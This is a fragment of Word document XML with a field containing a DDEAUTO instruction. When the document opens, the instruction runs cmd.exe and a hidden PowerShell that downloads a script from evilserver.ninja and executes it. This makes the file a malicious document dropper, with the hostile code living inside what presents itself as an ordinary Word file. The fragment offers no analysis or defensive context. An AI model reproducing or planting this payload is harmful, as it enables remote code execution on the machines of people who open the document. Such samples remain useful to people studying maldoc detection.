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FA" w:rsidRDefault="00796CFA">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00796CFA">
        <w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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</w:p>
    <w:sectPr w:rsidR="00796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FA"/>
    <w:rsid w:val="0079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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-05T03:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-05T03:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>